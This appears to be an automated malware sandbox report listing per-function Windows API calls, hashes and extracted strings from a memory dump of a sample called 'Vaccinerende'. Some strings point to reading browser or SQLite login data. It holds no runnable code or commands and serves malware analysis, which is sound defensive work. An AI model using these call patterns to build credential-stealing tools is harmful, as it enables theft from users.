                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                              APIs
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                              • String ID: ($d
                                                                              • API String ID: 1140211610-1915259565
                                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                              APIs
                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                              • String ID:
                                                                              • API String ID: 3015003838-0
                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00407E44
                                                                              • memset.MSVCRT ref: 00407E5B
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                              • String ID:
                                                                              • API String ID: 59245283-0
                                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                              • free.MSVCRT ref: 004185AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                              • String ID:
                                                                              • API String ID: 2802642348-0
                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                              APIs
                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                              • API String ID: 3510742995-3273207271
                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                              • memset.MSVCRT ref: 00413ADC
                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                              • memset.MSVCRT ref: 00413BD7
                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                              • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                              • String ID: 3A
                                                                              • API String ID: 3300951397-293699754
                                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                              • String ID: AE$.cfg$General$EA
                                                                              • API String ID: 776488737-1622828088
                                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                              • memset.MSVCRT ref: 0040D906
                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                              • String ID: sysdatetimepick32
                                                                              • API String ID: 1028950076-4169760276
                                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                              APIs
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: -journal$-wal
                                                                              • API String ID: 438689982-2894717839
                                                                              • Opcode ID: 4b2c7d81d4d1854398986e99fc7af02837fb5d8085184165747ed85e7b8d9990
                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                              • Opcode Fuzzy Hash: 4b2c7d81d4d1854398986e99fc7af02837fb5d8085184165747ed85e7b8d9990
                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Dialog$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3975816621-0
                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                              APIs
                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                              • API String ID: 1214746602-2708368587
                                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                              • String ID:
                                                                              • API String ID: 2313361498-0
                                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                              • String ID:
                                                                              • API String ID: 2047574939-0
                                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                              APIs
                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memset
                                                                              • String ID: gj
                                                                              • API String ID: 438689982-4203073231
                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                              APIs
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                              • memset.MSVCRT ref: 0040BE91
                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                              • String ID:
                                                                              • API String ID: 161710377-0
                                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                              APIs
